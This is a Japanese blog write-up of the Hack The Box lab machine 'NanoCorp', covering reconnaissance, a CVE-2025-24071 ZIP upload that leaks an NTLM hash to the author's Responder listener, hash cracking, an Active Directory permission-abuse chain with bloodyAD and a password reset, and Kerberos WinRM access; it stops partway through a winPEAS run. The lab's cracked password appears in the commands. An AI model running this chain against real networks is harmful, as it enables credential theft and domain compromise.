0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

初めに

本記事は Hack The Box(以下リンク参照) の「NanoCorp」にチャレンジした際の WriteUp になります。
※以前までのツールの使い方など詳細を書いたものではないのでご了承ください。

※悪用するのはやめてください。あくまで社会への貢献のためにこれらの技術を使用してください。法に触れるので。

初期探索

ポートスキャン

┌──(kali㉿kali)-[~/Desktop]
└─$ rustscan -a 10.10.11.93 --top  
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports: The virtual equivalent of knocking on doors.

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.11.93:88
Open 10.10.11.93:80
Open 10.10.11.93:135
Open 10.10.11.93:139
Open 10.10.11.93:389
Open 10.10.11.93:445
Open 10.10.11.93:464
Open 10.10.11.93:53
Open 10.10.11.93:593
Open 10.10.11.93:636
Open 10.10.11.93:3268
Open 10.10.11.93:3269
Open 10.10.11.93:5986
Open 10.10.11.93:9389
Open 10.10.11.93:49664
Open 10.10.11.93:49668
Open 10.10.11.93:51600
Open 10.10.11.93:51605
Open 10.10.11.93:51627
Open 10.10.11.93:59875
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-15 08:00 EST
Initiating Ping Scan at 08:00
Scanning 10.10.11.93 [4 ports]
Completed Ping Scan at 08:00, 0.35s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 08:00
Scanning DC01.nanocorp.htb (10.10.11.93) [20 ports]
Discovered open port 135/tcp on 10.10.11.93
Discovered open port 445/tcp on 10.10.11.93
Discovered open port 80/tcp on 10.10.11.93
Discovered open port 139/tcp on 10.10.11.93
Discovered open port 51627/tcp on 10.10.11.93
Discovered open port 636/tcp on 10.10.11.93
Discovered open port 53/tcp on 10.10.11.93
Discovered open port 49668/tcp on 10.10.11.93
Discovered open port 3269/tcp on 10.10.11.93
Discovered open port 51600/tcp on 10.10.11.93
Discovered open port 51605/tcp on 10.10.11.93
Discovered open port 3268/tcp on 10.10.11.93
Discovered open port 59875/tcp on 10.10.11.93
Discovered open port 389/tcp on 10.10.11.93
Discovered open port 593/tcp on 10.10.11.93
Discovered open port 5986/tcp on 10.10.11.93
Discovered open port 49664/tcp on 10.10.11.93
Discovered open port 88/tcp on 10.10.11.93
Discovered open port 9389/tcp on 10.10.11.93
Discovered open port 464/tcp on 10.10.11.93
Completed SYN Stealth Scan at 08:00, 0.88s elapsed (20 total ports)
Nmap scan report for DC01.nanocorp.htb (10.10.11.93)
Host is up, received echo-reply ttl 127 (0.55s latency).
Scanned at 2025-11-15 08:00:13 EST for 1s

PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
80/tcp    open  http             syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5986/tcp  open  wsmans           syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49664/tcp open  unknown          syn-ack ttl 127
49668/tcp open  unknown          syn-ack ttl 127
51600/tcp open  unknown          syn-ack ttl 127
51605/tcp open  unknown          syn-ack ttl 127
51627/tcp open  unknown          syn-ack ttl 127
59875/tcp open  unknown          syn-ack ttl 127

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.35 seconds
           Raw packets sent: 24 (1.032KB) | Rcvd: 78 (15.072KB)

WindowsのPortが開いている。AD環境ぽい。

ドメイン情報収集

ldapのスクリプトも回してさっとAD環境の情報を取得する。

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -p 389 -n -Pn --script ldap-rootdse 10.10.11.93
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-15 07:56 EST
Nmap scan report for 10.10.11.93
Host is up (0.55s latency).

PORT    STATE SERVICE
389/tcp open  ldap
| ldap-rootdse: 
| LDAP Results
|   <ROOT>
|       domainFunctionality: 7
|       forestFunctionality: 7
|       domainControllerFunctionality: 7
|       rootDomainNamingContext: DC=nanocorp,DC=htb
|       ldapServiceName: nanocorp.htb:dc01$@NANOCORP.HTB
|       isGlobalCatalogReady: TRUE
|       supportedSASLMechanisms: GSSAPI
|       supportedSASLMechanisms: GSS-SPNEGO
|       supportedSASLMechanisms: EXTERNAL
|       supportedSASLMechanisms: DIGEST-MD5
|       supportedLDAPVersion: 3
|       supportedLDAPVersion: 2
|       supportedLDAPPolicies: MaxPoolThreads
|       supportedLDAPPolicies: MaxPercentDirSyncRequests
|       supportedLDAPPolicies: MaxDatagramRecv
|       supportedLDAPPolicies: MaxReceiveBuffer
|       supportedLDAPPolicies: InitRecvTimeout
|       supportedLDAPPolicies: MaxConnections
|       supportedLDAPPolicies: MaxConnIdleTime
|       supportedLDAPPolicies: MaxPageSize
|       supportedLDAPPolicies: MaxBatchReturnMessages
|       supportedLDAPPolicies: MaxQueryDuration
|       supportedLDAPPolicies: MaxDirSyncDuration
|       supportedLDAPPolicies: MaxTempTableSize
|       supportedLDAPPolicies: MaxResultSetSize
|       supportedLDAPPolicies: MinResultSets
|       supportedLDAPPolicies: MaxResultSetsPerConn
|       supportedLDAPPolicies: MaxNotificationPerConn
|       supportedLDAPPolicies: MaxValRange
|       supportedLDAPPolicies: MaxValRangeTransitive
|       supportedLDAPPolicies: ThreadMemoryLimit
|       supportedLDAPPolicies: SystemMemoryLimitPercent
|       supportedControl: 1.2.840.113556.1.4.319
|       supportedControl: 1.2.840.113556.1.4.801
|       supportedControl: 1.2.840.113556.1.4.473
|       supportedControl: 1.2.840.113556.1.4.528
|       supportedControl: 1.2.840.113556.1.4.417
|       supportedControl: 1.2.840.113556.1.4.619
|       supportedControl: 1.2.840.113556.1.4.841
|       supportedControl: 1.2.840.113556.1.4.529
|       supportedControl: 1.2.840.113556.1.4.805
|       supportedControl: 1.2.840.113556.1.4.521
|       supportedControl: 1.2.840.113556.1.4.970
|       supportedControl: 1.2.840.113556.1.4.1338
|       supportedControl: 1.2.840.113556.1.4.474
|       supportedControl: 1.2.840.113556.1.4.1339
|       supportedControl: 1.2.840.113556.1.4.1340
|       supportedControl: 1.2.840.113556.1.4.1413
|       supportedControl: 2.16.840.1.113730.3.4.9
|       supportedControl: 2.16.840.1.113730.3.4.10
|       supportedControl: 1.2.840.113556.1.4.1504
|       supportedControl: 1.2.840.113556.1.4.1852
|       supportedControl: 1.2.840.113556.1.4.802
|       supportedControl: 1.2.840.113556.1.4.1907
|       supportedControl: 1.2.840.113556.1.4.1948
|       supportedControl: 1.2.840.113556.1.4.1974
|       supportedControl: 1.2.840.113556.1.4.1341
|       supportedControl: 1.2.840.113556.1.4.2026
|       supportedControl: 1.2.840.113556.1.4.2064
|       supportedControl: 1.2.840.113556.1.4.2065
|       supportedControl: 1.2.840.113556.1.4.2066
|       supportedControl: 1.2.840.113556.1.4.2090
|       supportedControl: 1.2.840.113556.1.4.2205
|       supportedControl: 1.2.840.113556.1.4.2204
|       supportedControl: 1.2.840.113556.1.4.2206
|       supportedControl: 1.2.840.113556.1.4.2211
|       supportedControl: 1.2.840.113556.1.4.2239
|       supportedControl: 1.2.840.113556.1.4.2255
|       supportedControl: 1.2.840.113556.1.4.2256
|       supportedControl: 1.2.840.113556.1.4.2309
|       supportedControl: 1.2.840.113556.1.4.2330
|       supportedControl: 1.2.840.113556.1.4.2354
|       supportedCapabilities: 1.2.840.113556.1.4.800
|       supportedCapabilities: 1.2.840.113556.1.4.1670
|       supportedCapabilities: 1.2.840.113556.1.4.1791
|       supportedCapabilities: 1.2.840.113556.1.4.1935
|       supportedCapabilities: 1.2.840.113556.1.4.2080
|       supportedCapabilities: 1.2.840.113556.1.4.2237
|       subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=nanocorp,DC=htb
|       serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=nanocorp,DC=htb
|       schemaNamingContext: CN=Schema,CN=Configuration,DC=nanocorp,DC=htb
|       namingContexts: DC=nanocorp,DC=htb
|       namingContexts: CN=Configuration,DC=nanocorp,DC=htb
|       namingContexts: CN=Schema,CN=Configuration,DC=nanocorp,DC=htb
|       namingContexts: DC=DomainDnsZones,DC=nanocorp,DC=htb
|       namingContexts: DC=ForestDnsZones,DC=nanocorp,DC=htb
|       isSynchronized: TRUE
|       highestCommittedUSN: 168300
|       dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=nanocorp,DC=htb
|       dnsHostName: DC01.nanocorp.htb
|       defaultNamingContext: DC=nanocorp,DC=htb
|       currentTime: 20251115195659.0Z
|_      configurationNamingContext: CN=Configuration,DC=nanocorp,DC=htb
Service Info: Host: DC01; OS: Windows

Nmap done: 1 IP address (1 host up) scanned in 2.51 seconds

nanocorp.htbのドメイン情報を掴むことが出来た。この情報を/etc/hostsに以下のように登録しておく。

10.10.11.93    nanocorp.htb

今回はクレデンシャルを渡す感じのものではなかったので初期侵入は難しそうね。

SMB列挙

┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient -N -L \\\\10.10.11.93
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.93 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

特段なさそう。

Web列挙

HTTPのポートが開いてたので見てみる
スクリーンショット 2025-11-15 221521.png
ほうほう。Whatwebでも見ておきますか。

┌──(kali㉿kali)-[~/Desktop/WhatWeb]
└─$ ./whatweb -v http://nanocorp.htb                       
WhatWeb report for http://nanocorp.htb
Status    : 200 OK
Title     : Nanocorp
IP        : 10.10.11.93
Country   : RESERVED, ZZ

Summary   : Apache[2.4.58], Bootstrap, HTML5, HTTPServer[Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12], JQuery, OpenSSL[3.1.3], PHP[8.2.12], Script

Detected Plugins:
[ Apache ]
	The Apache HTTP Server Project is an effort to develop and 
	maintain an open-source HTTP server for modern operating 
	systems including UNIX and Windows NT. The goal of this 
	project is to provide a secure, efficient and extensible 
	server that provides HTTP services in sync with the current 
	HTTP standards. 

	Version      : 2.4.58 (from HTTP Server Header)
	Google Dorks: (3)
	Website     : http://httpd.apache.org/

[ Bootstrap ]
	Bootstrap is an open source toolkit for developing with 
	HTML, CSS, and JS. 

	Website     : https://getbootstrap.com/

[ HTML5 ]
	HTML version 5, detected by the doctype declaration 


[ HTTPServer ]
	HTTP server header string. This plugin also attempts to 
	identify the operating system from the server header. 

	String       : Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 (from server string)

[ JQuery ]
	A fast, concise, JavaScript that simplifies how to traverse 
	HTML documents, handle events, perform animations, and add 
	AJAX. 

	Website     : http://jquery.com/

[ OpenSSL ]
	The OpenSSL Project is a collaborative effort to develop a 
	robust, commercial-grade, full-featured, and Open Source 
	toolkit implementing the Secure Sockets Layer (SSL v2/v3) 
	and Transport Layer Security (TLS v1) protocols as well as 
	a full-strength general purpose cryptography library. 

	Version      : 3.1.3
	Website     : http://www.openssl.org/

[ PHP ]
	PHP is a widely-used general-purpose scripting language 
	that is especially suited for Web development and can be 
	embedded into HTML. This plugin identifies PHP errors, 
	modules and versions and extracts the local file path and 
	username if present. 

	Version      : 8.2.12
	Google Dorks: (3)
	Website     : http://www.php.net/

[ Script ]
	This plugin detects instances of script HTML elements and 
	returns the script language/type. 


HTTP Headers:
	HTTP/1.1 200 OK
	Date: Sat, 15 Nov 2025 20:06:10 GMT
	Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
	Last-Modified: Thu, 10 Apr 2025 06:27:08 GMT
	ETag: "3f54-63266acdf17c3"
	Accept-Ranges: bytes
	Content-Length: 16212
	Connection: close
	Content-Type: text/html

特段気になるものはない。katanaでも見ておく。

┌──(kali㉿kali)-[~/Desktop]
└─$ katana -u http://nanocorp.htb

   __        __                
  / /_____ _/ /____ ____  ___ _
 /  '_/ _  / __/ _  / _ \/ _  /
/_/\_\\_,_/\__/\_,_/_//_/\_,_/							 

		projectdiscovery.io

[INF] Current katana version v1.1.2 (outdated)
[INF] Started standard crawling for => http://nanocorp.htb
http://nanocorp.htb

なさそう。

サブドメイン列挙

┌──(kali㉿kali)-[~/Desktop]
└─$ ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:FUZZ -u http://nanocorp.htb -H "Host: FUZZ.nanocorp.htb" -fc 301 -t 150

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://nanocorp.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.nanocorp.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 150
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 301
________________________________________________

hire                    [Status: 200, Size: 2520, Words: 646, Lines: 68, Duration: 3368ms]
:: Progress: [100000/100000] :: Job [1/1] :: 79 req/sec :: Duration: [0:14:58] :: Errors: 1478 ::

お、なんかある。
スクリーンショット 2025-11-15 221603.png
なんかZIPアップロードできそう。

ディレクトリ探索

このサイトを探ってみる。

┌──(kali㉿kali)-[~/Desktop]
└─$ dirsearch -u http://hire.nanocorp.htb
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/reports/http_hire.nanocorp.htb/_25-11-15_08-17-27.txt

Target: http://hire.nanocorp.htb/

[08:17:27] Starting: 
[08:17:38] 403 -  306B  - /%3f/
[08:17:38] 403 -  306B  - /%C0%AE%C0%AE%C0%AF
[08:17:39] 403 -  306B  - /%ff
[08:18:14] 403 -  306B  - /.htaccess.orig
[08:18:14] 403 -  306B  - /.htaccess_extra
[08:18:14] 403 -  306B  - /.htaccessBAK
[08:18:14] 403 -  306B  - /.htaccess_sc
[08:18:14] 403 -  306B  - /.htaccess.save
[08:18:14] 403 -  306B  - /.htaccess_orig
[08:18:14] 403 -  306B  - /.htaccess.sample
[08:18:14] 403 -  306B  - /.htaccess.bak1
[08:18:14] 403 -  306B  - /.ht_wsr.txt
[08:18:14] 403 -  306B  - /.htaccessOLD2
[08:18:14] 403 -  306B  - /.htaccessOLD
[08:18:14] 403 -  306B  - /.htm
[08:18:14] 403 -  306B  - /.httr-oauth
[08:18:14] 403 -  306B  - /.htpasswd_test
[08:18:15] 403 -  306B  - /.htpasswds
[08:18:15] 403 -  306B  - /.html
[08:20:35] 301 -  347B  - /assets  ->  http://hire.nanocorp.htb/assets/
[08:20:36] 200 -  984B  - /assets/
[08:20:59] 403 -  306B  - /cgi-bin/
[08:21:02] 500 -  647B  - /cgi-bin/printenv.pl
[08:22:02] 503 -  406B  - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[08:22:02] 503 -  406B  - /examples/servlets/servlet/RequestHeaderExample
[08:22:03] 503 -  406B  - /examples/websocket/index.xhtml
[08:22:03] 503 -  406B  - /examples/jsp/snp/snoop.jsp
[08:22:03] 503 -  406B  - /examples/
[08:22:03] 503 -  406B  - /examples/servlet/SnoopServlet
[08:22:03] 503 -  406B  - /examples/servlets/index.html
[08:22:03] 503 -  406B  - /examples/jsp/index.html
[08:22:03] 503 -  406B  - /examples
[08:22:03] 503 -  406B  - /examples/servlets/servlet/CookieExample
[08:22:23] 200 -  992B  - /images/
[08:22:23] 301 -  347B  - /images  ->  http://hire.nanocorp.htb/images/
[08:22:26] 403 -  306B  - /index.php::$DATA
[08:24:01] 403 -  306B  - /phpmyadmin
[08:24:12] 403 -  306B  - /phpmyadmin/
[08:24:13] 403 -  306B  - /phpmyadmin/docs/html/index.html
[08:24:13] 403 -  306B  - /phpmyadmin/doc/html/index.html
[08:24:13] 403 -  306B  - /phpmyadmin/ChangeLog
[08:24:13] 403 -  306B  - /phpmyadmin/phpmyadmin/index.php
[08:24:13] 403 -  306B  - /phpmyadmin/index.php
[08:24:13] 403 -  306B  - /phpmyadmin/scripts/setup.php
[08:24:13] 403 -  306B  - /phpmyadmin/README
[08:24:35] 403 -  425B  - /server-info
[08:24:35] 403 -  425B  - /server-status
[08:24:35] 403 -  425B  - /server-status/
[08:25:56] 403 -  306B  - /Trace.axd::$DATA
[08:26:01] 403 -  306B  - /uploads/
[08:26:01] 403 -  306B  - /uploads
[08:26:01] 403 -  306B  - /uploads/affwp-debug.log
[08:26:01] 403 -  306B  - /uploads/dump.sql
[08:26:02] 200 -    0B  - /upload.php
[08:26:11] 403 -  306B  - /web.config::$DATA
[08:26:12] 403 -  306B  - /webalizer
[08:26:12] 403 -  306B  - /webalizer/

Task Completed

┌──(kali㉿kali)-[~/Desktop]
└─$ katana -u http://hire.nanocorp.htb

   __        __                
  / /_____ _/ /____ ____  ___ _
 /  '_/ _  / __/ _  / _ \/ _  /
/_/\_\\_,_/\__/\_,_/_//_/\_,_/							 

		projectdiscovery.io

[INF] Current katana version v1.1.2 (outdated)
[INF] Started standard crawling for => http://hire.nanocorp.htb
http://hire.nanocorp.htb

uploads階層があるので適当にアップしてみる。
スクリーンショット 2025-11-15 222334.png
アクセスはできなさそう。ただ管理者がレジュメ確認するみたいなこと言ってたのでフィッシング系のイニシャルアクセスかな?と予想。

イニシャルアクセス

最近ZIPからのExplorer系の脆弱性あった気もするなと思ったので適当にCVE見てみたらあった。
ここらへんは肌間で探ればいい気がする。

CVE-2025-24071

Net-NTLMv2のハッシュを搾取できそうなPOCがあったので利用してみる。

┌──(kali㉿kali)-[~/Desktop]
└─$ python poc.py   
Enter your file name: exploit
Enter IP (EX: 192.168.1.162): 10.10.14.6   
completed

適当にアップしてみる。
スクリーンショット 2025-11-15 230549.png
以下でハッシュが来るのを待ち受ける。

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo responder -I tun0

アップして暫くするとハッシュが返ってくる。
このハッシュをHashcatで解析する。

┌──(kali㉿kali)-[~/Desktop]
└─$ hashcat -m 5600 -a 0 hash /usr/share/wordlists/rockyou.txt -r /usr/share/john/rules/best64.rule --force

スクリーンショット 2025-11-15 232203.png
よし、一匹捕まえた!

横展開

ドメイン列挙

ドメインユーザ見つければこっちのもんよ。まずはSMBだな。

┌──(kali㉿kali)-[~/Desktop]
└─$ nxc smb nanocorp.htb -u WEB_SVC -p 'dksehdgh712!@#' -d nanocorp.htb --shares
SMB         10.10.11.93     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.93     445    DC01             [+] nanocorp.htb\WEB_SVC:dksehdgh712!@# 
SMB         10.10.11.93     445    DC01             [*] Enumerated shares
SMB         10.10.11.93     445    DC01             Share           Permissions     Remark
SMB         10.10.11.93     445    DC01             -----           -----------     ------
SMB         10.10.11.93     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.93     445    DC01             C$                              Default share
SMB         10.10.11.93     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.93     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.93     445    DC01             SYSVOL          READ            Logon server share 

┌──(kali㉿kali)-[~/Desktop]
└─$ nxc smb nanocorp.htb -u WEB_SVC -p 'dksehdgh712!@#' -d nanocorp.htb -M gpp_password
SMB         10.10.11.93     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.93     445    DC01             [+] nanocorp.htb\WEB_SVC:dksehdgh712!@# 
SMB         10.10.11.93     445    DC01             [*] Enumerated shares
SMB         10.10.11.93     445    DC01             Share           Permissions     Remark
SMB         10.10.11.93     445    DC01             -----           -----------     ------
SMB         10.10.11.93     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.93     445    DC01             C$                              Default share
SMB         10.10.11.93     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.93     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.93     445    DC01             SYSVOL          READ            Logon server share 
GPP_PASS... 10.10.11.93     445    DC01             [+] Found SYSVOL share
GPP_PASS... 10.10.11.93     445    DC01             [*] Searching for potential XML files containing passwords
SMB         10.10.11.93     445    DC01             [*] Started spidering
SMB         10.10.11.93     445    DC01             [*] Spidering .
SMB         10.10.11.93     445    DC01             [*] Done spidering (Completed in 16.31669807434082)


┌──(kali㉿kali)-[~/Desktop]
└─$ nxc smb nanocorp.htb -u WEB_SVC -p 'dksehdgh712!@#' -d nanocorp.htb -M gpp_autologin
SMB         10.10.11.93     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.93     445    DC01             [+] nanocorp.htb\WEB_SVC:dksehdgh712!@# 
SMB         10.10.11.93     445    DC01             [*] Enumerated shares
SMB         10.10.11.93     445    DC01             Share           Permissions     Remark
SMB         10.10.11.93     445    DC01             -----           -----------     ------
SMB         10.10.11.93     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.93     445    DC01             C$                              Default share
SMB         10.10.11.93     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.93     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.93     445    DC01             SYSVOL          READ            Logon server share 
GPP_AUTO... 10.10.11.93     445    DC01             [+] Found SYSVOL share
GPP_AUTO... 10.10.11.93     445    DC01             [*] Searching for Registry.xml
SMB         10.10.11.93     445    DC01             [*] Started spidering
SMB         10.10.11.93     445    DC01             [*] Spidering .
SMB         10.10.11.93     445    DC01             [*] Done spidering (Completed in 17.028249740600586)

面白そうなの無いや。んじゃAD侵害の基本的な奴回しておくか。

┌──(kali㉿kali)-[~/Desktop]
└─$ nxc ldap dc01.nanocorp.htb -u WEB_SVC -p 'dksehdgh712!@#' -d nanocorp.htb --asreproast asreproast2.out
LDAP        10.10.11.93     389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:nanocorp.htb)
LDAP        10.10.11.93     389    DC01             [+] nanocorp.htb\WEB_SVC:dksehdgh712!@# 
LDAP        10.10.11.93     389    DC01             No entries found!
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop]
└─$ nxc ldap dc01.nanocorp.htb -u WEB_SVC -p 'dksehdgh712!@#' -d nanocorp.htb --kerberoasting kerberoasting.out
LDAP        10.10.11.93     389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:nanocorp.htb)
LDAP        10.10.11.93     389    DC01             [+] nanocorp.htb\WEB_SVC:dksehdgh712!@# 
LDAP        10.10.11.93     389    DC01             [*] Skipping disabled account: krbtgt
LDAP        10.10.11.93     389    DC01             [*] Total of records returned 0
                                                                                                                                                             
┌──(kali㉿kali)-[~/Desktop]
└─$ nxc ldap dc01.nanocorp.htb -u WEB_SVC -p 'dksehdgh712!@#' -d nanocorp.htb --password-not-required          
LDAP        10.10.11.93     389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:nanocorp.htb)
LDAP        10.10.11.93     389    DC01             [+] nanocorp.htb\WEB_SVC:dksehdgh712!@# 
LDAP        10.10.11.93     389    DC01             User: Guest Status: disabled

あんましいいのなさそう。続いてbloodhound取ります。

┌──(kali㉿kali)-[~/Desktop]
└─$ bloodhound-ce-python -c all -u WEB_SVC -p 'dksehdgh712!@#' -d nanocorp.htb -ns 10.10.11.93 --zip 
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: nanocorp.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.nanocorp.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.nanocorp.htb
INFO: Found 6 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.nanocorp.htb
INFO: Done in 00M 52S
INFO: Compressing output into 20251115093222_bloodhound.zip

スクリーンショット 2025-11-15 233358.png
MONITORING_SVCを侵害してWinRMへの流れで侵害ルートがみえました。これでUserフラグ辺りまでのルートは見えましたね。
BoodyADでACLをAbuseしていきます。

ACL Abuse

Group Add

えいや!

┌──(kali㉿kali)-[~/Desktop]
└─$ bloodyAD --host 10.10.11.93 -d nanocorp.htb -u web_svc -p 'dksehdgh712!@#' add groupMember "IT_SUPPORT" web_svc
[+] web_svc added to IT_SUPPORT

Pass change

そいや!

┌──(kali㉿kali)-[~/Desktop]
└─$ bloodyAD --host 10.10.11.93 -d nanocorp.htb -u web_svc -p 'dksehdgh712!@#' set password MONITORING_SVC 'Password123!'
[+] Password changed successfully!

んじゃアクセスできるか確認します。

┌──(kali㉿kali)-[~/Desktop]
└─$ nxc smb nanocorp.htb -u MONITORING_SVC -p 'Password123!' -d nanocorp.htb                                             
SMB         10.10.11.93     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.93     445    DC01             [-] nanocorp.htb\MONITORING_SVC:Password123! STATUS_ACCOUNT_RESTRICTION 

あー、この表示はNTLM認証で入れないやつか、面倒だな。
Kerberos認証でいかないといけなさそう。

WinRMでKerberos認証をするにはrealmのコンフィグ設定入れないといけないので面倒ですが、以下のPythonツールでさらっと作ってくれます。

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo python3 configure_krb5.py nanocorp.htb dc01

後はTGTゲットしてWinRMするだけ。faketimeで時差でのエラーを解消しておきましょう。WinRMツールとしてはevil-winrm-pyが便利です。

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo apt install gcc python3-dev libkrb5-dev krb5-pkinit


┌──(kali㉿kali)-[~/Desktop]
└─$ pipx install evil-winrm-py[kerberos] 
Installing to existing venv 'evil-winrm-py'
  installed package evil-winrm-py 1.5.0, installed using Python 3.13.9
  These apps are now globally available
    - evil-winrm-py
    - ewp
done! ✨ 🌟 ✨

TGTくださーい!!!

┌──(kali㉿kali)-[~/Desktop]
└─$ faketime -f '+7h' impacket-getTGT nanocorp.htb/MONITORING_SVC:'Password123!'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in MONITORING_SVC.ccache

接続させてくんろ
スクリーンショット 2025-11-16 010541.png
よし!!!勝った!これでユーザフラグゲットだぜ!

特権昇格

情報収集

winPeasとりあえず回します。

evil-winrm-py PS C:\Users\monitoring_svc\Documents> C:\Windows\Temp\winPEASx64.exe
 [!] If you want to run the file analysis checks (search sensitive information in files), you need to specify the 'fileanalysis' or 'all' argument. Note that this search might take several minutes. For help, run winpeass.exe --help
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
     
               ((((((((((((((((((((((((((((((((
        (((((((((((((((((((((((((((((((((((((((((((
      ((((((((((((((**********/##########(((((((((((((   
    ((((((((((((********************/#######(((((((((((
    ((((((((******************/@@@@@/****######((((((((((
    ((((((********************@@@@@@@@@@/***,####((((((((((
    (((((********************/@@@@@%@@@@/********##(((((((((
    (((############*********/%@@@@@@@@@/************((((((((
    ((##################(/******/@@@@@/***************((((((
    ((#########################(/**********************(((((
    ((##############################(/*****************(((((
    ((###################################(/************(((((
    ((#######################################(*********(((((
    ((#######(,.***.,(###################(..***.*******(((((
    ((#######*(#####((##################((######/(*****(((((
    ((###################(/***********(##############()(((((
    (((#####################/*******(################)((((((
    ((((############################################)((((((
    (((((##########################################)(((((((
    ((((((########################################)(((((((
    ((((((((####################################)((((((((
    (((((((((#################################)(((((((((
        ((((((((((##########################)(((((((((
